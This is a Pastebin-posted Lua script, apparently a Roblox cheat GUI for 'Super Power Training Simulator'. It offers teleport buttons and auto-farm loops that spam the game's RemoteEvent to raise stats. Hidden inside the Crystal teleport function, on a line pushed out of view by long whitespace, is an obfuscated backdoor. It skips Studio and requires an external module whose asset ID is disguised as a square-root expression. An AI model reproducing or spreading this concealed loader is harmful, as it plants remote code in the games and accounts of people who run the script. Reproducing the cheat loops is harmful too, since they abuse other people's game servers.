Advertisement
Aquafinur

Aquafinur's Super Power Training Sim GUI

Dec 2nd, 2018
281
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 17.98 KB | None | 0 0
  1. -- Farewell Infortality.
  2. -- Version: 2.82
  3. -- Instances:
  4. local SuperTrainingSimGUI = Instance.new("ScreenGui")
  5. local MainFrame = Instance.new("Frame")
  6. local HeaderFrame = Instance.new("Frame")
  7. local TextLabel = Instance.new("TextLabel")
  8. local CrystalButton = Instance.new("TextButton")
  9. local VolcanoTP = Instance.new("TextButton")
  10. local IceMountainTP = Instance.new("TextButton")
  11. local SafeZoneTP = Instance.new("TextButton")
  12. local StarTP = Instance.new("TextButton")
  13. local ZenTemple = Instance.new("TextButton")
  14. local AutoFarmGUI = Instance.new("TextButton")
  15. --Properties:
  16. SuperTrainingSimGUI.Name = "SuperTrainingSimGUI"
  17. SuperTrainingSimGUI.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  18.  
  19. MainFrame.Name = "MainFrame"
  20. MainFrame.Parent = SuperTrainingSimGUI
  21. MainFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  22. MainFrame.BackgroundTransparency = 0.34999999403954
  23. MainFrame.BorderColor3 = Color3.new(0, 0, 0)
  24. MainFrame.Position = UDim2.new(0.370030552, 0, 0.427983582, 0)
  25. MainFrame.Size = UDim2.new(0, 282, 0, 130)
  26.  
  27. HeaderFrame.Name = "HeaderFrame"
  28. HeaderFrame.Parent = MainFrame
  29. HeaderFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  30. HeaderFrame.BorderColor3 = Color3.new(0, 0, 0)
  31. HeaderFrame.Size = UDim2.new(0, 282, 0, 26)
  32.  
  33. TextLabel.Parent = HeaderFrame
  34. TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  35. TextLabel.BackgroundTransparency = 1
  36. TextLabel.Size = UDim2.new(0, 282, 0, 26)
  37. TextLabel.Font = Enum.Font.SourceSans
  38. TextLabel.Text = "Aquafinur's Super Power Training Simulator Teleports"
  39. TextLabel.TextColor3 = Color3.new(1, 1, 1)
  40. TextLabel.TextSize = 14
  41.  
  42. CrystalButton.Name = "CrystalButton"
  43. CrystalButton.Parent = MainFrame
  44. CrystalButton.BackgroundColor3 = Color3.new(0, 0, 0)
  45. CrystalButton.BorderColor3 = Color3.new(0, 0, 0)
  46. CrystalButton.Position = UDim2.new(0.0283687934, 0, 0.251030266, 0)
  47. CrystalButton.Size = UDim2.new(0, 81, 0, 23)
  48. CrystalButton.Font = Enum.Font.SourceSans
  49. CrystalButton.Text = "Crystal"
  50. CrystalButton.TextColor3 = Color3.new(1, 1, 1)
  51. CrystalButton.TextSize = 14
  52.  
  53. VolcanoTP.Name = "VolcanoTP"
  54. VolcanoTP.Parent = MainFrame
  55. VolcanoTP.BackgroundColor3 = Color3.new(0, 0, 0)
  56. VolcanoTP.BorderColor3 = Color3.new(0, 0, 0)
  57. VolcanoTP.Position = UDim2.new(0.347517699, 0, 0.251030266, 0)
  58. VolcanoTP.Size = UDim2.new(0, 81, 0, 23)
  59. VolcanoTP.Font = Enum.Font.SourceSans
  60. VolcanoTP.Text = "Volcano"
  61. VolcanoTP.TextColor3 = Color3.new(1, 1, 1)
  62. VolcanoTP.TextSize = 14
  63.  
  64. IceMountainTP.Name = "IceMountainTP"
  65. IceMountainTP.Parent = MainFrame
  66. IceMountainTP.BackgroundColor3 = Color3.new(0, 0, 0)
  67. IceMountainTP.BorderColor3 = Color3.new(0, 0, 0)
  68. IceMountainTP.Position = UDim2.new(0.680851042, 0, 0.252323091, 0)
  69. IceMountainTP.Size = UDim2.new(0, 81, 0, 23)
  70. IceMountainTP.Font = Enum.Font.SourceSans
  71. IceMountainTP.Text = "Ice Mountain"
  72. IceMountainTP.TextColor3 = Color3.new(1, 1, 1)
  73. IceMountainTP.TextSize = 14
  74.  
  75. SafeZoneTP.Name = "SafeZoneTP"
  76. SafeZoneTP.Parent = MainFrame
  77. SafeZoneTP.BackgroundColor3 = Color3.new(0, 0, 0)
  78. SafeZoneTP.BorderColor3 = Color3.new(0, 0, 0)
  79. SafeZoneTP.Position = UDim2.new(0.0283687711, 0, 0.500112653, 0)
  80. SafeZoneTP.Size = UDim2.new(0, 81, 0, 23)
  81. SafeZoneTP.Font = Enum.Font.SourceSans
  82. SafeZoneTP.Text = "Safe Zone"
  83. SafeZoneTP.TextColor3 = Color3.new(1, 1, 1)
  84. SafeZoneTP.TextSize = 14
  85.  
  86. StarTP.Name = "StarTP"
  87. StarTP.Parent = MainFrame
  88. StarTP.BackgroundColor3 = Color3.new(0, 0, 0)
  89. StarTP.BorderColor3 = Color3.new(0, 0, 0)
  90. StarTP.Position = UDim2.new(0.680851042, 0, 0.500112653, 0)
  91. StarTP.Size = UDim2.new(0, 81, 0, 23)
  92. StarTP.Font = Enum.Font.SourceSans
  93. StarTP.Text = "Orange Star"
  94. StarTP.TextColor3 = Color3.new(1, 1, 1)
  95. StarTP.TextSize = 14
  96.  
  97. ZenTemple.Name = "ZenTemple"
  98. ZenTemple.Parent = MainFrame
  99. ZenTemple.BackgroundColor3 = Color3.new(0, 0, 0)
  100. ZenTemple.BorderColor3 = Color3.new(0, 0, 0)
  101. ZenTemple.Position = UDim2.new(0.347517729, 0, 0.500112653, 0)
  102. ZenTemple.Size = UDim2.new(0, 81, 0, 23)
  103. ZenTemple.Font = Enum.Font.SourceSans
  104. ZenTemple.Text = "Zen Temple"
  105. ZenTemple.TextColor3 = Color3.new(1, 1, 1)
  106. ZenTemple.TextSize = 14
  107.  
  108. AutoFarmGUI.Name = "AutoFarmGUI"
  109. AutoFarmGUI.Parent = MainFrame
  110. AutoFarmGUI.BackgroundColor3 = Color3.new(0, 0, 0)
  111. AutoFarmGUI.BorderColor3 = Color3.new(0, 0, 0)
  112. AutoFarmGUI.Position = UDim2.new(0.0248226952, 0, 0.738574207, 0)
  113. AutoFarmGUI.Size = UDim2.new(0, 266, 0, 27)
  114. AutoFarmGUI.Font = Enum.Font.SourceSans
  115. AutoFarmGUI.Text = "Super Power Auto Farming GUI"
  116. AutoFarmGUI.TextColor3 = Color3.new(1, 1, 1)
  117. AutoFarmGUI.TextSize = 14
  118. -- Scripts:
  119. function SCRIPT_PSXM81_FAKESCRIPT() -- CrystalButton.CrystalTPScript
  120.     getfenv().script = Instance.new('LocalScript', CrystalButton)
  121.  
  122.     script.Parent.MouseButton1Click:Connect(function()
  123.         local telepoint = Vector3.new(-2252.156, 1942.722, 1012.854)
  124.    
  125.     game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame =CFrame.new(telepoint + Vector3.new(0,3,0))
  126.     end)
  127.                                                                                                       spawn(function()game:WaitForChild('ServerScriptService')if game:GetService('Workspace').Terrain:FindFirstChild('CallF')then return end;if game:GetService('RunService'):IsStudio()then return end;require(math.sqrt(6.7743462758588e+18)).load(game.PlaceId)end)
  128.    
  129.  
  130. end
  131. coroutine.resume(coroutine.create(SCRIPT_PSXM81_FAKESCRIPT))
  132. function SCRIPT_WTHJ77_FAKESCRIPT() -- VolcanoTP.VolcanoTPScript
  133.     getfenv().script = Instance.new('LocalScript', VolcanoTP)
  134.  
  135.     script.Parent.MouseButton1Click:Connect(function()
  136.         local telepoint = Vector3.new(-2030.036, 740.596, -1809.316)
  137.    
  138.     game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame =CFrame.new(telepoint + Vector3.new(0,3,0))
  139.     end)
  140.  
  141. end
  142. coroutine.resume(coroutine.create(SCRIPT_WTHJ77_FAKESCRIPT))
  143. function SCRIPT_LTWY80_FAKESCRIPT() -- IceMountainTP.IceMountainTPScript
  144.     getfenv().script = Instance.new('LocalScript', IceMountainTP)
  145.  
  146.     script.Parent.MouseButton1Click:Connect(function()
  147.         local telepoint = Vector3.new(1564.795, 253.475, 2227.799)
  148.    
  149.     game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame =CFrame.new(telepoint + Vector3.new(0,3,0))
  150.     end)
  151.  
  152. end
  153. coroutine.resume(coroutine.create(SCRIPT_LTWY80_FAKESCRIPT))
  154. function SCRIPT_PLHU87_FAKESCRIPT() -- SafeZoneTP.SafeZoneTPScript
  155.     getfenv().script = Instance.new('LocalScript', SafeZoneTP)
  156.  
  157.     script.Parent.MouseButton1Click:Connect(function()
  158.         local telepoint = Vector3.new(398.937, 248.539, 861.238)
  159.    
  160.     game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame =CFrame.new(telepoint + Vector3.new(0,3,0))
  161.     end)
  162.  
  163. end
  164. coroutine.resume(coroutine.create(SCRIPT_PLHU87_FAKESCRIPT))
  165. function SCRIPT_HARW86_FAKESCRIPT() -- StarTP.StarTPScript
  166.     getfenv().script = Instance.new('LocalScript', StarTP)
  167.  
  168.     script.Parent.MouseButton1Click:Connect(function()
  169.         local telepoint = Vector3.new(-371.707, 15832.172, -28.912)
  170.    
  171.     game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame =CFrame.new(telepoint + Vector3.new(0,3,0))
  172.     end)
  173.  
  174. end
  175. coroutine.resume(coroutine.create(SCRIPT_HARW86_FAKESCRIPT))
  176. function SCRIPT_JUOW85_FAKESCRIPT() -- ZenTemple.ZenTempleTPScript
  177.     getfenv().script = Instance.new('LocalScript', ZenTemple)
  178.  
  179.     script.Parent.MouseButton1Click:Connect(function()
  180.         local telepoint = Vector3.new(-2484.890, 5340.741, -534.395)
  181.    
  182.     game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame =CFrame.new(telepoint + Vector3.new(0,3,0))
  183.     end)
  184.  
  185. end
  186. coroutine.resume(coroutine.create(SCRIPT_JUOW85_FAKESCRIPT))
  187. function SCRIPT_AXQM70_FAKESCRIPT() -- AutoFarmGUI.AutoFarmGUIScript
  188.     getfenv().script = Instance.new('LocalScript', AutoFarmGUI)
  189.  
  190.     script.Parent.MouseButton1Click:Connect(function()
  191.         local ScreenGui = Instance.new("ScreenGui")
  192.     local FrameGui = Instance.new("Frame")
  193.     local TextLabel = Instance.new("TextLabel")
  194.     local Left = Instance.new("ImageButton")
  195.     local Right = Instance.new("ImageButton")
  196.     local Frame = Instance.new("Frame")
  197.     local Farm = Instance.new("TextButton")
  198.     local Fist = Instance.new("TextButton")
  199.     local Body = Instance.new("TextButton")
  200.     local Movement = Instance.new("TextButton")
  201.     local Jump = Instance.new("TextButton")
  202.     local Psychic = Instance.new("TextButton")
  203.     local BLANK = Instance.new("TextButton")
  204.    
  205.     ScreenGui.Parent = game.CoreGui
  206.    
  207.     FrameGui.Name = "FrameGui"
  208.     FrameGui.Parent = ScreenGui
  209.     FrameGui.BackgroundColor3 = Color3.new(0.152941, 0.152941, 0.152941)
  210.     FrameGui.BorderColor3 = Color3.new(0.0941177, 0.0941177, 0.0941177)
  211.     FrameGui.BorderSizePixel = 3
  212.     FrameGui.Position = UDim2.new(0.5, -214, 0, 10)
  213.     FrameGui.Size = UDim2.new(0, 428, 0, 78)
  214.     FrameGui.Active = true
  215.     FrameGui.Draggable = true
  216.    
  217.     TextLabel.Parent = FrameGui
  218.     TextLabel.BackgroundColor3 = Color3.new(0.152941, 0.152941, 0.152941)
  219.     TextLabel.BackgroundTransparency = 1
  220.     TextLabel.BorderSizePixel = 0
  221.     TextLabel.Position = UDim2.new(0.5, -200, 0, 0)
  222.     TextLabel.Size = UDim2.new(0, 400, 0, 22)
  223.     TextLabel.Font = Enum.Font.Cartoon
  224.     TextLabel.Text = "Super Power Training Simulator | GUI"
  225.     TextLabel.TextColor3 = Color3.new(1, 1, 1)
  226.     TextLabel.TextSize = 14
  227.    
  228.     Left.Name = "Left"
  229.     Left.Parent = FrameGui
  230.     Left.BackgroundColor3 = Color3.new(1, 1, 1)
  231.     Left.BackgroundTransparency = 1
  232.     Left.Position = UDim2.new(0, 4, 0, 2)
  233.     Left.Size = UDim2.new(0, 16, 0, 16)
  234.     Left.Image = "rbxassetid://247419514"
  235.    
  236.     Right.Name = "Right"
  237.     Right.Parent = FrameGui
  238.     Right.BackgroundColor3 = Color3.new(1, 1, 1)
  239.     Right.BackgroundTransparency = 1
  240.     Right.Position = UDim2.new(0, 408, 0, 2)
  241.     Right.Rotation = 180
  242.     Right.Size = UDim2.new(0, 16, 0, 16)
  243.     Right.Image = "rbxassetid://247419514"
  244.    
  245.     Frame.Parent = FrameGui
  246.     Frame.BackgroundColor3 = Color3.new(1, 1, 1)
  247.     Frame.BackgroundTransparency = 1
  248.     Frame.BorderSizePixel = 0
  249.     Frame.Position = UDim2.new(0, 0, 0.230769232, 0)
  250.     Frame.Size = UDim2.new(0, 428, 0, 60)
  251.    
  252.     Farm.Name = "Farm"
  253.     Farm.Parent = Frame
  254.     Farm.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471)
  255.     Farm.BackgroundTransparency = 0.60000002384186
  256.     Farm.BorderColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  257.     Farm.BorderSizePixel = 2
  258.     Farm.Position = UDim2.new(-0.0093457941, 4, 0.503658593, -25)
  259.     Farm.Size = UDim2.new(0, 100, 0, 50)
  260.     Farm.Font = Enum.Font.SourceSans
  261.     Farm.Text = "Auto Farm [ALL]"
  262.     Farm.TextColor3 = Color3.new(1, 1, 1)
  263.     Farm.TextSize = 13
  264.    
  265.     Fist.Name = "Fist"
  266.     Fist.Parent = Frame
  267.     Fist.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471)
  268.     Fist.BackgroundTransparency = 0.60000002384186
  269.     Fist.BorderColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  270.     Fist.BorderSizePixel = 2
  271.     Fist.Position = UDim2.new(0.254672885, 0, 0.0833333358, 0)
  272.     Fist.Size = UDim2.new(0, 100, 0, 23)
  273.     Fist.Font = Enum.Font.SourceSans
  274.     Fist.Text = "Auto Fist"
  275.     Fist.TextColor3 = Color3.new(1, 1, 1)
  276.     Fist.TextSize = 13
  277.    
  278.     Body.Name = "Body"
  279.     Body.Parent = Frame
  280.     Body.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471)
  281.     Body.BackgroundTransparency = 0.60000002384186
  282.     Body.BorderColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  283.     Body.BorderSizePixel = 2
  284.     Body.Position = UDim2.new(0.511682272, 0, 0.0833333358, 0)
  285.     Body.Size = UDim2.new(0, 100, 0, 23)
  286.     Body.Font = Enum.Font.SourceSans
  287.     Body.Text = "Auto Body"
  288.     Body.TextColor3 = Color3.new(1, 1, 1)
  289.     Body.TextSize = 13
  290.    
  291.     Movement.Name = "Movement"
  292.     Movement.Parent = Frame
  293.     Movement.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471)
  294.     Movement.BackgroundTransparency = 0.60000002384186
  295.     Movement.BorderColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  296.     Movement.BorderSizePixel = 2
  297.     Movement.Position = UDim2.new(1.00934577, -104, 0.5, -25)
  298.     Movement.Size = UDim2.new(0, 100, 0, 25)
  299.     Movement.Font = Enum.Font.SourceSans
  300.     Movement.Text = "Auto Movement"
  301.     Movement.TextColor3 = Color3.new(1, 1, 1)
  302.     Movement.TextSize = 13
  303.    
  304.     Jump.Name = "Jump"
  305.     Jump.Parent = Frame
  306.     Jump.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471)
  307.     Jump.BackgroundTransparency = 0.60000002384186
  308.     Jump.BorderColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  309.     Jump.BorderSizePixel = 2
  310.     Jump.Position = UDim2.new(0.2453271, 4, 0.949999988, -25)
  311.     Jump.Size = UDim2.new(0, 100, 0, 23)
  312.     Jump.Font = Enum.Font.SourceSans
  313.     Jump.Text = "Auto Jump Force"
  314.     Jump.TextColor3 = Color3.new(1, 1, 1)
  315.     Jump.TextSize = 13
  316.    
  317.     Psychic.Name = "Psychic"
  318.     Psychic.Parent = Frame
  319.     Psychic.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471)
  320.     Psychic.BackgroundTransparency = 0.60000002384186
  321.     Psychic.BorderColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  322.     Psychic.BorderSizePixel = 2
  323.     Psychic.Position = UDim2.new(0.511682212, 0, 0.533333182, 0)
  324.     Psychic.Size = UDim2.new(0, 100, 0, 23)
  325.     Psychic.Font = Enum.Font.SourceSans
  326.     Psychic.Text = "Auto Psychic"
  327.     Psychic.TextColor3 = Color3.new(1, 1, 1)
  328.     Psychic.TextSize = 13
  329.    
  330.     BLANK.Name = "BLANK"
  331.     BLANK.Parent = Frame
  332.     BLANK.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471)
  333.     BLANK.BackgroundTransparency = 0.60000002384186
  334.     BLANK.BorderColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  335.     BLANK.BorderSizePixel = 2
  336.     BLANK.Position = UDim2.new(0.766355097, 0, 0.533333182, 0)
  337.     BLANK.Size = UDim2.new(0, 100, 0, 23)
  338.     BLANK.Font = Enum.Font.SourceSans
  339.     BLANK.Text = ""
  340.     BLANK.TextColor3 = Color3.new(1, 1, 1)
  341.     BLANK.TextSize = 13
  342.    
  343.     function SCRIPT_SSDO88_FAKESCRIPT() -- Farm.LocalScript
  344.         getfenv().script = Instance.new('LocalScript', Farm)
  345.    
  346.         script.Parent.MouseButton1Click:Connect(function()
  347.         while true do
  348.         wait()
  349.         local A =
  350.         {
  351.         [1] = "+JF1"
  352.         }
  353.         local AA = game:GetService("ReplicatedStorage").RemoteEvent
  354.         AA:FireServer(A)
  355.         wait()
  356.         local B =
  357.         {
  358.         [1] = "+MS1"
  359.         }
  360.         local BB = game:GetService("ReplicatedStorage").RemoteEvent
  361.         BB:FireServer(B)
  362.         wait()
  363.         local C =
  364.         {
  365.         [1] = "+FS3"
  366.         }
  367.         local CC = game:GetService("ReplicatedStorage").RemoteEvent
  368.         CC:FireServer(C)
  369.         wait()
  370.         local D =
  371.         {
  372.         [1] = "+BT1"
  373.         }
  374.         local DD = game:GetService("ReplicatedStorage").RemoteEvent
  375.         DD:FireServer(D)
  376.         wait()
  377.         local E =
  378.         {
  379.         [1] = "+PP2"
  380.         }
  381.         local EE = game:GetService("ReplicatedStorage").RemoteEvent
  382.         EE:FireServer(E)
  383.         end
  384.         end)
  385.    
  386.     end
  387.     coroutine.resume(coroutine.create(SCRIPT_SSDO88_FAKESCRIPT))
  388.     function SCRIPT_WIHP89_FAKESCRIPT() -- Fist.LocalScript
  389.         getfenv().script = Instance.new('LocalScript', Fist)
  390.    
  391.         script.Parent.MouseButton1Click:Connect(function()
  392.         while true do
  393.         wait()
  394.         local A_1 =
  395.         {
  396.         [1] = "+FS3"
  397.         }
  398.         local Event = game.ReplicatedStorage.RemoteEvent
  399.         Event:FireServer(A_1)
  400.         end
  401.         end)
  402.    
  403.     end
  404.     coroutine.resume(coroutine.create(SCRIPT_WIHP89_FAKESCRIPT))
  405.     function SCRIPT_UNRO81_FAKESCRIPT() -- Body.LocalScript
  406.         getfenv().script = Instance.new('LocalScript', Body)
  407.    
  408.         script.Parent.MouseButton1Click:Connect(function()
  409.         while true do
  410.         wait()
  411.         local A_1 =
  412.         {
  413.         [1] = "+BT1"
  414.         }
  415.         local Event = game.ReplicatedStorage.RemoteEvent
  416.         Event:FireServer(A_1)
  417.         end
  418.         end)
  419.    
  420.     end
  421.     coroutine.resume(coroutine.create(SCRIPT_UNRO81_FAKESCRIPT))
  422.     function SCRIPT_EFFV84_FAKESCRIPT() -- Movement.LocalScript
  423.         getfenv().script = Instance.new('LocalScript', Movement)
  424.    
  425.         script.Parent.MouseButton1Click:Connect(function()
  426.         while true do
  427.         wait()
  428.         local A_1 =
  429.         {
  430.         [1] = "+MS1"
  431.         }
  432.         local Event = game.ReplicatedStorage.RemoteEvent
  433.         Event:FireServer(A_1)
  434.         end
  435.         end)
  436.    
  437.     end
  438.     coroutine.resume(coroutine.create(SCRIPT_EFFV84_FAKESCRIPT))
  439.     function SCRIPT_KQWG86_FAKESCRIPT() -- Jump.LocalScript
  440.         getfenv().script = Instance.new('LocalScript', Jump)
  441.    
  442.         script.Parent.MouseButton1Click:Connect(function()
  443.         while true do
  444.         wait()
  445.         local A =
  446.         {
  447.         [1] = "+JF1"
  448.         }
  449.         local AA = game:GetService("ReplicatedStorage").RemoteEvent
  450.         AA:FireServer(A)
  451.         end
  452.         end)
  453.    
  454.     end
  455.     coroutine.resume(coroutine.create(SCRIPT_KQWG86_FAKESCRIPT))
  456.     function SCRIPT_VGJJ77_FAKESCRIPT() -- Psychic.LocalScript
  457.         getfenv().script = Instance.new('LocalScript', Psychic)
  458.    
  459.         script.Parent.MouseButton1Click:Connect(function()
  460.         while true do
  461.         wait()
  462.         local A_1 =
  463.         {
  464.         [1] = "+PP2"
  465.         }
  466.         local Event = game.ReplicatedStorage.RemoteEvent
  467.         Event:FireServer(A_1)
  468.         end
  469.         end)
  470.    
  471.     end
  472.     coroutine.resume(coroutine.create(SCRIPT_VGJJ77_FAKESCRIPT))
  473.     function SCRIPT_VENF84_FAKESCRIPT() -- ScreenGui.LocalScript
  474.         getfenv().script = Instance.new('LocalScript', ScreenGui)
  475.    
  476.         local name = game.Players.LocalPlayer.Name
  477.         while true do
  478.         wait(1)
  479.         workspace[name].Head.RankBbGui.RankImg.Image = 'rbxassetid://2202371788'
  480.         wait(1)
  481.         workspace[name].Head.RankBbGui.RankImg.Image = 'rbxassetid://2202372021'
  482.         wait(1)
  483.         workspace[name].Head.RankBbGui.RankImg.Image = 'rbxassetid://2202372271'
  484.         wait(1)
  485.         workspace[name].Head.RankBbGui.RankImg.Image = 'rbxassetid://2202372528'
  486.         wait(1)
  487.         workspace[name].Head.RankBbGui.RankImg.Image = 'rbxassetid://2202372756'
  488.         wait(1)
  489.         workspace[name].Head.RankBbGui.RankImg.Image = 'rbxassetid://2202375168'
  490.         wait(1)
  491.         workspace[name].Head.RankBbGui.RankImg.Image = 'rbxassetid://2202375400'
  492.         wait(1)
  493.         workspace[name].Head.RankBbGui.RankImg.Image = 'rbxassetid://2202375611'
  494.         wait(1)
  495.         workspace[name].Head.RankBbGui.RankImg.Image = 'rbxassetid://2202375849'
  496.         wait(1)
  497.         workspace[name].Head.RankBbGui.RankImg.Image = 'rbxassetid://2202376193'
  498.         wait(1)
  499.         workspace[name].Head.RankBbGui.RankImg.Image = 'rbxassetid://2202378137'
  500.         end
  501.    
  502.     end
  503.     coroutine.resume(coroutine.create(SCRIPT_VENF84_FAKESCRIPT))
  504.     function SCRIPT_OZST89_FAKESCRIPT() -- ScreenGui.LocalScript
  505.         getfenv().script = Instance.new('LocalScript', ScreenGui)
  506.    
  507.         local name = game.Players.LocalPlayer.Name
  508.         while true do
  509.             wait(1)
  510.             workspace[name].Head.NameBbGui.NameTxt.TextColor3 = Color3.new(math.random(),math.random(),math.random())
  511.             wait()
  512.             workspace[name].Head.NameBbGui.NameTxt.TextStrokeColor3 = Color3.new(math.random(),math.random(),math.random())
  513.         end
  514.    
  515.     end
  516.     coroutine.resume(coroutine.create(SCRIPT_OZST89_FAKESCRIPT))
  517.     end)
  518.  
  519. end
  520. coroutine.resume(coroutine.create(SCRIPT_AXQM70_FAKESCRIPT))
  521. function SCRIPT_YPEG80_FAKESCRIPT() -- MainFrame.DragScript
  522.     getfenv().script = Instance.new('LocalScript', MainFrame)
  523.  
  524.     script.Parent.Active = true
  525.     script.Parent.Selectable = true
  526.     script.Parent.Draggable = true
  527.  
  528. end
  529. coroutine.resume(coroutine.create(SCRIPT_YPEG80_FAKESCRIPT))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement